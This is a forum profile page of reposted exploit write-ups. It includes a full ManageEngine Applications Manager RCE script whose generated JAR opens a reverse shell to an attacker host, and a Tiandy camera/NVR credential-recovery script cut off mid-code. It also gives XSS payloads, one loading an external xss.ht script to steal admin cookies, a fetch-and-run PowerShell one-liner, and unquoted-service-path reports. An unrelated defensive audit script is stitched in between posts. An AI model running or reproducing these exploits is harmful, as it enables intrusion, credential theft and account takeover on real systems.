HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
     # Discovery Date: 2020-09-03
     # Discovery by: chipo
     # Vendor Homepage: https://nordvpn.com
     # Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
     # Tested Version: 6.31.13.0
     # Tested on OS: Windows 10 Pro x64 es
     # Vulnerability Type: Unquoted Service Path

     # Find the Unquoted Service Path Vulnerability:
     C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
     nordvpn-service  nordvpn-service  C:\Program Files\NordVPN\nordvpn-service.exe

     # Service info:
     C:\>sc qc servicio
     [SC] QueryServiceConfig SUCCESS

     NOMBRE_SERVICIO: nordvpn-service
             TIPO                  : 10  WIN32_OWN_PROCESS
             TIPO_INICIO           : 2   AUTO_START
             CONTROL_ERROR         : 1   NORMAL
             NOMBRE_RUTA_BINARIO   : C:\Program Files\NordVPN\nordvpn-service.exe
             GRUPO_ORDEN_CARGA     :
             ETIQUETA              : 0
             NOMBRE_MOSTRAR        : nordvpn-service
             DEPENDENCIAS          :
             NOMBRE_INICIO_SERVICIO: LocalSystem

     #Exploit:
     A successful attempt to exploit this vulnerability could allow code execution during startup or reboot with elevated privileges.
  2. # Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
     # Discovery Date: 2020-09-08
     # Discovery by: Alan Lacerda (alacerda)
     # Vendor Homepage: https://www.sharemouse.com/
     # Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
     # Version: 5.0.43
     # Tested on OS: Microsoft Windows 10 Pro EN
     # OS Version: 10.0.19041

     PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
     PS > Invoke-AllChecks

     ServiceName   : ShareMouse Service
     Path          : C:\Program Files (x86)\ShareMouse\smService.exe
     StartName     : LocalSystem
     AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>

     PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName

     AcceptStop  DisplayName         PathName                                         StartName
     TRUE        ShareMouse Service  C:\Program Files (x86)\ShareMouse\smService.exe  LocalSystem

     #Exploit:
     # A successful attempt would require the local user to be able to insert their code in the system root path
     # undetected by the OS or other security applications where it could potentially be executed during
     # application startup or reboot. If successful, the local user's code would execute with the elevated
     # privileges of the application.
  3. #!/usr/bin/python3
     # Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)
     # Google Dork: None
     # Date: 2020-09-04
     # Exploit Author: Hodorsec
     # Vendor Homepage: https://manageengine.co.uk
     # Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html
     # Software Link: http://archives.manageengine.com/applications_manager/14720/
     # Version: Until version 14720
     # Tested on: version 12900 and version 14700
     # CVE : CVE-2020-14008

     # Summary:
     # POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers
     # Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor
     # When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method

     # Vulnerable code:
     # Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
     # 129 /*     */   public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception {
     # 130 /* 130 */     ClassLoader current = Thread.currentThread().getContextClassLoader();
     # 131 /*     */     try {
     # 132 /* 132 */       boolean setcredentials = false;
     # 133 /* 133 */       String url = "t3://" + hostname + ":" + portString;
     # 134 /* 134 */       JarLoader jarLoader = null;
     # 135 /*     */
     # ....<SNIP>....
     # 143 /*     */       }
     # 144 /* 144 */       else if (version == 8)
     # 145 /*     */       {
     # 146 /* 146 */         if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists())
     # 147 /*     */         {
     # 148 /*     */
     # 149 /* 149 */           jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar");
     # 150 /*     */
     # ....<SNIP>....
     # 170 /* 170 */       Thread.currentThread().setContextClassLoader(jarLoader);
     # 171 /* 171 */       Class cls = jarLoader.loadClass("weblogic.jndi.Environment");
     # 172 /* 172 */       Object env = cls.newInstance();

     # Example call for MAM version 12900:
     # $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar
     # [*] Visiting page to retrieve initial cookies...
     # [*] Retrieving admin cookie...
     # [*] Getting base directory of ManageEngine...
     # [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12
     # [*] Creating JAR file...
     # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
     # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
     # added manifest
     # adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%)
     # [*] Uploading JAR file...
     # [*] Attempting to upload JAR directly to targeted Weblogic folder...
     # [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!
     # [*] Running the Weblogic credentialtest which triggers the code in the JAR...
     # [*] Check your shell...

     # Function flow:
     # 1. Get initial cookie
     # 2. Get valid session cookie by logging in
     # 3. Get base directory of installation
     # 4. Generate a malicious JAR file
     # 5. Attempt to directly upload JAR, if success, jump to 7
     # 6. Create task with random ID to copy JAR file to expected Weblogic location
     # 7. Execute task
     # 8. Delete task for cleanup
     # 9. Run the vulnerable credentialTest, using the malicious JAR

     import requests
     import urllib3
     import shutil
     import subprocess
     import os
     import sys
     import random
     import re
     from lxml import html

     # Optionally, use a proxy
     # proxy = "http://<user>:<pass>@<proxy>:<port>"
     proxy = ""
     os.environ['http_proxy'] = proxy
     os.environ['HTTP_PROXY'] = proxy
     os.environ['https_proxy'] = proxy
     os.environ['HTTPS_PROXY'] = proxy

     # Disable cert warnings
     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

     # Set timeout
     timeout = 10

     # Handle CTRL-C
     def keyboard_interrupt():
         """Handles keyboardinterrupt exceptions"""
         print("\n\n[*] User requested an interrupt, exiting...")
         exit(0)

     # Custom headers
     def http_headers():
         headers = {
             'User-Agent': 'Mozilla',
         }
         return headers

     def get_initial_cookie(url,headers):
         print("[*] Visiting page to retrieve initial cookies...")
         target = url + "/index.do"
         r = requests.get(target,headers=headers,timeout=timeout,verify=False)
         return r.cookies

     def get_valid_cookie(url,headers,initial_cookies,usern,passw):
         print("[*] Retrieving admin cookie...")
         appl_cookie = "JSESSIONID_APM_9090"
         post_data = {'clienttype':'html',
                      'webstart':'',
                      'j_username':usern,
                      'ScreenWidth':'1280',
                      'ScreenHeight':'709',
                      'username':usern,
                      'j_password':passw,
                      'submit':'Login'}
         target = url + "/j_security_check"
         r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False)
         res = r.text
         if "Server responded in " in res:
             return r.cookies
         else:
             print("[!] No valid response from used session, exiting!\n")
             exit(-1)

     def get_base_dir(url,headers,valid_cookie):
         print("[*] Getting base directory of ManageEngine...")
         target = url + "/common/serverinfo.do"
         params = {'service':'AppManager',
                   'reqForAdminLayout':'true'}
         r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
         tree = html.fromstring(r.content)
         pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title')
         base_dir = pathname[0]
         print("[*] Found base directory: " + base_dir)
         return base_dir

     def create_jar(command,jarname,revhost,revport):
         print("[*] Creating JAR file...")
         # Variables
         classname = "Environment"
         pkgname = "weblogic.jndi"
         fullname = pkgname + "." + classname
         manifest = "MANIFEST.MF"

         # Directory variables
         curdir = os.getcwd()
         metainf_dir = "META-INF"
         maindir = "weblogic"
         subdir = maindir + "/jndi"
         builddir = curdir + "/" + subdir

         # Check if directory exist, else create directory
         try:
             if os.path.isdir(builddir):
                 pass
             else:
                 os.makedirs(builddir)
         except OSError:
             print("[!] Error creating local directory \"" + builddir + "\", check permissions...")
             exit(-1)

         # Creating the text file using given parameters
         javafile = '''package ''' + pkgname + ''';

     import java.io.IOException;
     import java.io.InputStream;
     import java.io.OutputStream;
     import java.net.Socket;
     import java.util.concurrent.TimeUnit;

     public class ''' + classname + ''' {
         // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
         // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance()
         public void setProviderUrl(String string) throws Exception {
             System.out.println("Hello from setProviderUrl()");
             connect();
         }

         // Normal main() entry
         public static void main(String args[]) throws Exception {
             System.out.println("Hello from main()");
             // Added delay to notice being called from main()
             TimeUnit.SECONDS.sleep(10);
             connect();
         }

         // Where the magic happens
         public static void connect() throws Exception {
             String host = "''' + revhost + '''";
             int port = ''' + str(revport) + ''';
             String[] cmd = {"''' + command + '''"};
             Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
             Socket s=new Socket(host,port);
             InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
             OutputStream po=p.getOutputStream(),so=s.getOutputStream();
             while(!s.isClosed()) {
                 while(pi.available()>0)
                     so.write(pi.read());
                 while(pe.available()>0)
                     so.write(pe.read());
                 while(si.available()>0)
                     po.write(si.read());
                 so.flush();
                 po.flush();
                 try {
                     p.exitValue();
                     break;
                 }
                 catch (Exception e){
                 }
             };
             p.destroy();
             s.close();
         }
     }'''

         # Output file to desired directory
         os.chdir(builddir)
         print(javafile,file=open(classname + ".java","w"))

         # Go to previous directory to create JAR file
         os.chdir(curdir)

         # Create the compiled .class file
         cmdCompile = "javac --release 7 " + subdir + "/*.java"
         process = subprocess.call(cmdCompile,shell=True)

         # Creating Manifest file
         try:
             if os.path.isdir(metainf_dir):
                 pass
             else:
                 os.makedirs(metainf_dir)
         except OSError:
             print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...")
             exit(-1)
         print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w"))

         # Create JAR file
         cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class"
         process = subprocess.call(cmdJar,shell=True)

         # Cleanup directories
         try:
             shutil.rmtree(metainf_dir)
             shutil.rmtree(maindir)
         except:
             print("[!] Error while cleaning up directories.")
         return True

     def upload_jar(url,headers,valid_cookie,jarname,rel_path):
         print("[*] Uploading JAR file...")
         target = url + "/Upload.do"
         path_normal = './'
         path_trav = rel_path
         jar = {'theFile':(jarname,open(jarname, 'rb'))}
         print("[*] Attempting to upload JAR directly to targeted Weblogic folder...")
         post_data = {'uploadDir':path_trav}
         r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
         res = r_upload.text
         if "successfully uploaded" not in res:
             print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...")
             post_data = {'uploadDir':path_normal}
             jar = {'theFile':(jarname,open(jarname, 'rb'))}
             r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
             return "normal_path"
         else:
             print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!")
             return "trav_path"

     def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir):
         print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...")
         valid_resp = "Execute Program succesfully created."
         target = url + "/adminAction.do"
         post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null',
                      'method':'createExecProgAction',
                      'id':'0',
                      'displayname':action_name,
                      'serversite':'local',
                      'choosehost':'-2',
                      'prompt':'$',
                      'command':'move weblogic.jar ' + rel_path,
                      'execProgExecDir':work_dir,
                      'abortafter':'10',
                      'cancel':'false'}
         r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
         res = r.text
         found_id = ""
         if action_name in res:
             tree = html.fromstring(r.content)
             actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick')
             actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()')
             i = 0
             for name in actionnames:
                 for url in actionurls:
                     if action_name in name:
                         found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1)
                         print("[*] Found actionname: " + action_name + " with found actionid " + found_id)
                         break
                 i+=1
             return found_id
         else:
             print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.")
             exit(-1)

     def exec_task(url,headers,valid_cookie,found_id):
         print("[*] Executing created task with id: " + found_id + " to copy JAR...")
         valid_resp = "has been successfully executed"
         target = url + "/common/executeScript.do"
         params = {'method':'testAction',
                   'actionID':found_id,
                   'haid':'null'}
         r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
         res = r.text
         if valid_resp in res:
             print("[*] Task " + found_id + " has been executed successfully")
         else:
             print("[!] Task not executed. Check requests, exiting...")
             exit(-1)
         return

     def del_task(url,headers,valid_cookie,found_id):
         print("[*] Deleting created task as JAR has been copied...")
         target = url + "/adminAction.do"
         params = {'method':'deleteProgExecAction'}
         post_data = {'haid':'null',
                      'headercheckbox':'on',
                      'progcheckbox':found_id}
         r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)

     def run_credtest(url,headers,valid_cookie):
         print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...")
         target = url + "/testCredential.do"
         post_data = {'method':'testCredentialForConfMonitors',
                      'serializedData':'url=/jsp/newConfType.jsp',
                      'searchOptionValue':'',
                      'query':'',
                      'addtoha':'null',
                      'resourceid':'',
                      'montype':'WEBLOGIC:7001',
                      'isAgentEnabled':'NO',
                      'resourcename':'null',
                      'isAgentAssociated':'false',
                      'hideFieldsForIT360':'null',
                      'childNodesForWDM':'[]',
                      'csrfParam':'',
                      'type':'WEBLOGIC:7001',
                      'displayname':'test',
                      'host':'localhost',
                      'netmask':'255.255.255.0',
                      'resolveDNS':'False',
                      'port':'7001',
                      'CredentialDetails':'nocm',
                      'cmValue':'-1',
                      'version':'WLS_8_1',
                      'sslenabled':'False',
                      'username':'test',
                      'password':'test',
                      'pollinterval':'5',
                      'groupname':''}
         print("[*] Check your shell...")
         requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False)
         return

     # Main
     def main(argv):
         if len(sys.argv) == 6:
             url = sys.argv[1]
             usern = sys.argv[2]
             passw = sys.argv[3]
             revhost = sys.argv[4]
             revport = sys.argv[5]
         else:
             print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>")
             print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n")
             exit(0)

         # Do stuff
         try:
             # Set HTTP headers
             headers = http_headers()
             # Relative path to copy the malicious JAR file
             rel_path = "classes/weblogic/version8/"
             # Generate a random ID to use for the task name and task tracking
             random_id = str(random.randrange(0000,9999))
             # Action_name used for displaying actions in overview
             action_name = "move_weblogic_jar" + random_id
             # Working dir to append to base dir
             base_append = "\\working\\"
             # Name for JAR file to use
             jarname = "weblogic.jar"
             # Command shell to use
             cmd = "cmd.exe"

             # Execute functions
             initial_cookies = get_initial_cookie(url,headers)
             valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw)
             work_dir = get_base_dir(url,headers,valid_cookie) + base_append
             create_jar(cmd,jarname,revhost,revport)
             status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path)

             # Check if JAR can be uploaded via Directory Traversal
             # If so, no need to add and exec actions; just run the credentialtest directly
             if status_jar == "trav_path":
                 run_credtest(url,headers,valid_cookie)
             # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest
             elif status_jar == "normal_path":
                 found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir)
                 exec_task(url,headers,valid_cookie,found_id)
                 del_task(url,headers,valid_cookie,found_id)
                 run_credtest(url,headers,valid_cookie)
         except requests.exceptions.Timeout:
             print("[!] Timeout error\n")
             exit(-1)
         except requests.exceptions.TooManyRedirects:
             print("[!] Too many redirects\n")
             exit(-1)
         except requests.exceptions.ConnectionError:
             print("[!] Not able to connect to URL\n")
             exit(-1)
         except requests.exceptions.HTTPError as e:
             # HTTPError is a RequestException subclass, so it must be caught before the generic handler
             print("[!] Failed with HTTP error - " + str(e) + "\n")
             exit(-1)
         except requests.exceptions.RequestException as e:
             print("[!] " + str(e))
             exit(-1)
         except KeyboardInterrupt:
             keyboard_interrupt()

     # If we were called as a program, go execute the main function.
     if __name__ == "__main__":
         main(sys.argv[1:])
  4. # Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting
     # Date: 2020-09-06
     # Exploit Author: Mufaddal Masalawala
     # Vendor Homepage: https://berrnd.de/
     # Software Link: https://github.com/grocy/grocy
     # Version: 2.7.1
     # Tested on: Kali Linux 2020.3

     # Proof Of Concept:
     grocy household management solution v2.7.1 allows stored XSS and HTML Injection via the Create Shopping List module; the payload is rendered upon deleting that Shopping List.

     To exploit this vulnerability:
     1. Login to the application
     2. Go to 'Shopping List' module
     3. Click on 'New Shopping List' module
     4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name' input field.
     5. Click Save
     6. Click 'Delete Shopping List'

     #REQUEST -->
     POST /api/objects/shopping_lists HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://127.0.0.1/shoppinglist/new
     Content-type: application/json
     Content-Length: 38
     Connection: close
     Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd

     {"name":"<marquee onstart=alert(1)> "}

     #RESPONSE -->
     HTTP/1.1 200 OK
     Server: nginx/1.18.0
     Date: Sun, 06 Sep 2020 12:53:13 GMT
     Content-Type: application/json
     Connection: close
     X-Powered-By: PHP/7.3.21
     Content-Length: 26

     {"created_object_id":"21"}

     Regards,
     Mufaddal M
  5. # Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting
     # Date: 2020-09-06
     # Exploit Author: Abhiram V
     # Vendor Homepage: https://cabotapp.com/
     # Software Link: https://github.com/arachnys/cabot
     # Version: 0.11.12
     # Tested on: Ubuntu Linux

     ############################################################################
     Introduction

     Cabot is a free, open-source, self-hosted infrastructure monitoring platform that provides some of the best features of PagerDuty, Server Density, Pingdom and Nagios without their cost and complexity. It provides a web interface that allows us to monitor services and send telephone, SMS or HipChat/email alerts to your on-duty team if those services start misbehaving or go down.

     ############################################################################
     XSS details: Blind XSS
     ############################################################################

     Executing Blind XSS in New Instances leads to admin account takeover

     URL
     http://127.0.0.1:5000/instance/create/

     PAYLOAD
     "><script src=https://anonart.xss.ht></script>
     *payload from xsshunter.com platform for finding blind xss*

     PARAMETER
     Address column

     EXPLOITATION
     Create a user account under the django administrator account and login as that user to perform the attack.
     Create a new instance and save the instance, then navigate to Services.
     Create a new Service, then input a Name and Url (for the POC I used BlindXSS in both columns).
     Then append the admin account in the "Users to notify" column, use status check and instances, then save.
     Now the admin account gets a notification; when the admin runs the check, the Blind XSS executes in the background.
     On logging in to xsshunter.com we can see the screenshots, cookies and all details of the admin account.

     IMPACT
     Stored XSS can be executed from any account and triggered in any account, including django administration, unknowingly by the victim (here it is admin), and compromise the accounts.
     Tested in both xsshunter.com and blindf.com. Attacker can also use stored xss payloads here.
     ############################################################################
  6. # Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
     # Discovery Date: 2020-09-08
     # Response from Input Director Support: 09/09/2020
     # Exploit Author: TOUHAMI Kasbaoui
     # Vendor Homepage: https://www.inputdirector.com/
     # Version: 1.4.3
     # Tested on: Windows Server 2012, Windows 10

     # Find the Unquoted Service Path Vulnerability:
     C:\>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
     Input Director Service  InputDirector  C:\Program Files (x86)\InputDirector\IDWinService.exe  Auto

     # Service info:
     C:\>sc qc IDWinService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: InputDirector
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Input Director\IDWinService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Input Director Service
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     # Exploit:
     A successful attempt to exploit this vulnerability could allow executing code during startup or reboot with elevated privileges.
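Added audit helper, not part of any post above: it applies the filter the wmic/findstr one-liners in items 1, 2 and 6 rely on (auto-start, unquoted, path contains a space, outside C:\Windows) to service PathName values and emits the matching `sc config ... binPath=` quoting fix. The sample rows are constructed from the paths those three posts report, plus hypothetical non-vulnerable services to show what is correctly ignored.

```python
import re

# Constructed sample rows modelled on the wmic output in the posts above:
# (service name, PathName as reported by the SCM, StartMode).
SAMPLE_SERVICES = [
    ("nordvpn-service", r"C:\Program Files\NordVPN\nordvpn-service.exe", "Auto"),
    ("ShareMouse Service", r"C:\Program Files (x86)\ShareMouse\smService.exe", "Auto"),
    ("InputDirector", r"C:\Program Files (x86)\Input Director\IDWinService.exe", "Auto"),
    ("FixedSvc", r'"C:\Program Files\Vendor\svc.exe" -run', "Auto"),      # hypothetical, already quoted
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Manual"),  # under the Windows dir, not Auto
    ("NoSpaces", r"C:\Tools\agent.exe", "Auto"),                            # hypothetical, no space in path
]

# Unquoted PathName: executable runs up to the first ".exe", anything after is arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def split_binpath(pathname):
    """Split a PathName into (executable, arguments, was_quoted)."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        if end == -1:                      # unbalanced quote: treat the rest as the exe
            return p.strip('"'), "", True
        return p[1:end], p[end + 1:].strip(), True
    m = _EXE_RE.match(p)
    if not m:
        return p, "", False
    return m.group(1), (m.group(2) or "").strip(), False


def is_unquoted_service_path(pathname, ignore_windows_dir=True):
    """True when the SCM would mis-parse the path: unquoted, contains a space and,
    by default, not under C:\\Windows (the same exclusion the posts' findstr applies)."""
    exe, _args, quoted = split_binpath(pathname)
    if quoted or " " not in exe:
        return False
    if ignore_windows_dir and exe.lower().startswith("c:\\windows\\"):
        return False
    return True


def fixed_binpath(pathname):
    """Return the PathName with the executable quoted, unchanged if no fix is needed."""
    if not is_unquoted_service_path(pathname, ignore_windows_dir=False):
        return pathname
    exe, args, _ = split_binpath(pathname)
    return f'"{exe}"' + (f" {args}" if args else "")


def sc_config_command(name, pathname):
    """Build the remediation command; sc's binPath= needs the inner quotes escaped as \\"."""
    fixed = fixed_binpath(pathname).replace('"', '\\"')
    return f'sc config "{name}" binPath= "{fixed}"'


def audit(services):
    """Return [(name, pathname, remediation)] for auto-start services with an unquoted path."""
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto":
            continue
        if is_unquoted_service_path(pathname):
            findings.append((name, pathname, sc_config_command(name, pathname)))
    return findings


if __name__ == "__main__":
    for name, pathname, fix in audit(SAMPLE_SERVICES):
        print(f"[!] {name}: {pathname}\n    fix: {fix}")
```

On a real host, feed `audit()` rows parsed from `wmic service get name,pathname,startmode` (or `Get-CimInstance Win32_Service`) instead of the constructed sample.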
  7. # Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
     # Date: 2020-09-10
     # Exploit Author: zb3
     # Vendor Homepage: http://en.tiandy.com
     # Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
     # Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
     # Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
     # Tested on: Linux
     # CVE: N/A

     # Requires Python 3 and PyCrypto
     # For more details and information on how to escalate this further, see:
     # https://github.com/zb3/tiandy-research

     import sys
     import hashlib
     import base64
     import socket
     import struct
     from Crypto.Cipher import DES

     def main():
         if len(sys.argv) != 2:
             print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
             exit(1)

         host = sys.argv[1]

         conn = Channel(host)
         conn.connect()

         crypt_key = conn.get_crypt_key(65536)

         attempts = 2
         tried_to_set_mail = False
         ok = False

         while attempts > 0:
             attempts -= 1

             code = get_psw_code(conn)
             if code == False: # psw not supported
                 break
             elif code == None:
                 if not tried_to_set_mail:
                     print("No PSW data found, we'll try to set it...", file=sys.stderr)
                     tried_to_set_mail = True
                     if try_set_mail(conn, 'a@a.a'):
                         code = get_psw_code(conn)

                 if code == None:
                     print("couldn't set mail", file=sys.stderr)
                     break

             rcode, password = recover_with_code(conn, code, crypt_key)
             if rcode == 5:
                 print('The device is locked, try again later.', file=sys.stderr)
                 break

             if rcode == 0:
                 print('Admin', password)
                 ok = True
                 break

         if tried_to_set_mail:
             try_set_mail(conn, '')

         if not code:
             print("PSW is not supported, trying default credentials...", file=sys.stderr)
             credentials = recover_with_default(conn, crypt_key)
             if credentials:
                 user, pw = credentials
                 print(user, pw)
                 ok = True

         if not ok:
             print('Recovery failed', file=sys.stderr)
             exit(1)

     def try_set_mail(conn, target):
         conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT'])
         resp = conn.recv_msg()
         return resp[4:7] == ['RESERVEPHONE', '2', '1']

     def get_psw_code(conn):
         conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1'])
         resp = conn.recv_msg()
         if resp[4] != 'FINDPSW':
             return False

         psw_reg = psw_data = None
         if len(resp) > 7:
             psw_reg = resp[6]
             psw_data = resp[7]

         if not psw_data:
             return None

         psw_type = int(resp[5])
         if psw_type not in (1, 2, 3):
             raise Exception('unsupported psw type: '+str(psw_type))

         if psw_type == 3:
             psw_data = psw_data.split('"')[3]

         if psw_type == 1:
             psw_data = psw_data.split(':')[1]
             psw_key = psw_reg[:0x1f]
         elif psw_type in (2, 3):
             psw_key = psw_reg[:4].lower()

         psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
         code = hashlib.md5(psw_code).hexdigest()[24:]
         return code

     def recover_with_code(conn, code, crypt_key):
         conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
         resp = conn.recv_msg()
         rcode = int(resp[6])
         if rcode == 0:
             return rcode, decode(resp[8].encode(), crypt_key).decode()
         return rcode, None

     def recover_with_default(conn, crypt_key):
         res = conn.login_with_key(b'Default', b'Default', crypt_key)
         if not res:
             return False

         while True:
             msg = conn.recv_msg()
             if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']:
                 return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode()

     ###
     ### lib/des.py
     ###

     def reverse_bits(data):
         return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data])

     def pad(data):
         if len(data) % 8:
             padlen = 8 - (len(data) % 8)
             data = data + b'\x00' * (padlen-1) + bytes([padlen])
         return data

     def unpad(data):
         padlen = data[-1]
         if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1):
             data = data[:-padlen]
         return data

     def encrypt(data, key):
         cipher = DES.new(reverse_bits(key), 1)
         return reverse_bits(cipher.encrypt(reverse_bits(pad(data))))

     def decrypt(data, key):
         cipher = DES.new(reverse_bits(key), 1)
         return unpad(reverse_bits(cipher.decrypt(reverse_bits(data))))

     def encode(data, key):
         return base64.b64encode(encrypt(data, key))

     def decode(data, key):
         return decrypt(base64.b64decode(data), key)

     ###
     ### lib/binproto.py
     ###

     def recvall(s, l):
         buf = b''
         while len(buf) < l:
             nbuf = s.recv(l - len(buf))
             if not nbuf:
                 break
             buf += nbuf
         return buf

     class Channel:
         def __init__(self, ip, port=3001):
             self.ip = ip
             self.ip_bytes = socket.inet_aton(ip)[::-1]
             self.port = port
             self.msg_seq = 0
             self.data_seq = 0
             self.msg_queue = []

         def fileno(self):
             return self.socket.fileno()

         def connect(self):
             self.socket = socket.socket()
             self.socket.connect((self.ip, self.port))

         def reconnect(self):
             self.socket.close()
             self.connect()

         def send_cmd(self, data):
             self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
             self.msg_seq += 1

         def send_data(self, stream_type, data):
             self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
             self.data_seq += 1

         def recv(self):
             hdr = recvall(self.socket, 20)
             if hdr[:4] == b'\xf1\xf5\xea\xf9':
                 lsize, stream_type = struct.unpack('<14xHI', hdr)
                 data = recvall(self.socket, lsize - 20)
                 if data[:4] != b'NVS\x00':
                     print(data[:4], b'NVS\x00')
                     raise Exception('invalid data header')
                 return None, [stream_type, data[8:]]
             elif hdr[:4] == b'\xf1\xf5\xea\xf5':
                 lsize, dsize = struct.unpack('<6xH10xH', hdr)
                 if lsize != dsize + 20:
                     raise Exception('size mismatch')
                 msgs = []
